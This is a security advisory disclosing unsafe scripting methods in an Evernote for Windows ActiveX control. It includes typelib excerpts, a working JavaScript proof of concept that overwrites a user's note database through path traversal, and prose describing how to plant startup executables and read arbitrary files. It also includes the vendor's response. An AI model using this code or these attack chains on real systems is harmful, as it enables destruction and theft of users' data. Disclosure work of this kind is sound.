SSD Advisory – Multiple Evernote Vulnerabilities

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
Evernote lets you take notes, sync files across your devices, save webpages, capture inspiration, and share your ideas with friends and colleagues.
Vulnerability Details
Multiple vulnerabilities have been found in Evernote for Windows, these vulnerabilities can lead to remote code execution.

The Evernote product installs an ActiveX Control with the following settings:

CLSID: {92EF2EAD-A7CE-4424-B0DB-499CF856608E}
ProgID: EvernoteIE.Addin.2
Binary Path: C:\Program Files\Evernote\Evernote\EvernoteIE.dll
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True

According to the Windows registry, this control is marked “Safe for Scripting” and “Safe for initialization”. Given this, Internet Explorer will allow to script its properties and methods according to the target user browser security settings.
When the product is installed and starting Internet Explorer, the browser will ask if enabling the add-on or not. However, there high chances a licensed user will enable all features to maximize the application’s use. On Windows XP is enabled by default and, given this, the described vulnerabilities will work without user interaction other than browsing a web page.
Vulnerabilities
it offers various unsafe methods, see typelib:

...
/* DISPID=1610743810 */
/* VT_VARIANT [12] */
function LoadFile(
/* VT_BSTR [8] [in] */ $scriptName
)
{
 /* method LoadFile */
}
...
...
/* DISPID=1610743840 */
/* VT_VARIANT [12] */
function ReadFileContent(
/* VT_BSTR [8] [in] */ $path
)
{
 /* method ReadFileContent */
}
/* DISPID=1610743841 */
function WriteFileContent(
/* VT_BSTR [8] [in] */ $path,
/* VT_BSTR [8] [in] */ $content
)
{
 /* method WriteFileContent */
}
...
...
/* DISPID=1610743858 */
/* VT_VARIANT [12] */
function GetLastLoginUser(
)
{
 /* method GetLastLoginUser */
}

[1] writeFileContent
The writeFileContent() method allows to store arbitrary files inside arbitrary locations. It is possible to write inside automatic startup folders, if the user has the privileges to do so, example code:


calc.exe will run at the next computer startup.
[2] ReadFileContent
the ReadFileContent() method can be abused to read arbitrary files from the target PC, example code:

it will store the file content inside a variable, then the file can be stored inside
a remote network share through WriteFileContent().
[3] LoadFile
the LoadFile() method can be abused to read arbitrary files from the target PC, example code:

this will store into a variable the content of win.ini. Then the variable could be sent to a remote web server through javascript.
[4] GetLastLoginUser and WriteFileContent
Denial of service through GetLastLoginUser() and WriteFileContent, this will overwrite the database file for the target user, if not in use, disrupting all saved notes:

<script>
var obj = new ActiveXObject("EvernoteIE.Addin.2");
var x = obj.GetLastLoginUser();
document.write("<pre> " + x + "</pre>");
//modify the path, including the Windows username
try{
  obj.WriteFileContent("..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Users\\[Windows username]\\AppData\\Local\\Evernote\\Evernote\\Databases\\" + x + ".exb","aaaa");
}catch(e){
}
//otherwise try Administrator
try{
  obj.WriteFileContent("..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Users\\Administrator\\AppData\\Local\\Evernote\\Evernote\\Databases\\" + x + ".exb","aaaa");
}catch(e){
}
</script>

The only limitation on Windows 7 (and newer) is that the UAC (if enabled) will prevents to write files, however code execution could be possible by reading specific configuration files which may contain containing authentication credentials.
Vulnerable Version
Evernote for Windows 5.7.2
Footnote
We attempted to report these vulnerabilities in March 2015, but have not received any answer, a follow up tweet in July asked us to resend the information which got us a prompt response.
Vendor Response

We’ve already credited another researcher for these findings, and believe they were addressed in the 5.8 release of Evernote for Windows.
We received the first report from “In-Gyu, Tae” via KrCERT in November 2014, after they claimed to have gotten no response from US-CERT in August 2014. We weren’t doing release notes at the time. I’m embarrassed to say that the commit that credited In-Gyu, Tae for identifying these problems was stashed and not committed at the time, which I’ve just rectified.

Interested in Buffer Overflow? You may be interested in these:

Looking to submit a Buffer Overflow vulnerability?

Talk to us!